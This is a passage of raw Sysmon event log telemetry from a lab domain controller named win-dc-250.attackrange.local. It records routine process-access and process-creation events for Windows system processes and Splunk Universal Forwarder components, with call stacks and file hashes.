indows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:17.523{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:17.523{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:17.523{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:17.523{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4AB1-6000-9D05-000000009A01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:17.523{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AB1-6000-9D05-000000009A01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:17.523{08A6967A-4AB1-6000-9D05-000000009A01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.976{08A6967A-4AB2-6000-9F05-000000009A01}70407108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.820{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AB2-6000-9F05-000000009A01}7040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.820{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.820{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.820{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.820{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.820{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4AB2-6000-9F05-000000009A01}7040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.820{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AB2-6000-9F05-000000009A01}7040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.821{08A6967A-4AB2-6000-9F05-000000009A01}7040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.351{08A6967A-4AB2-6000-9E05-000000009A01}424212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.195{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AB2-6000-9E05-000000009A01}424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.195{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.195{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.195{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.195{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.195{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4AB2-6000-9E05-000000009A01}424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.195{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4AB2-6000-9E05-000000009A01}424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:18.195{08A6967A-4AB2-6000-9E05-000000009A01}424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:19.945{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4AB3-6000-A005-000000009A01}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:19.945{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:19.945{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:44:19.945{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 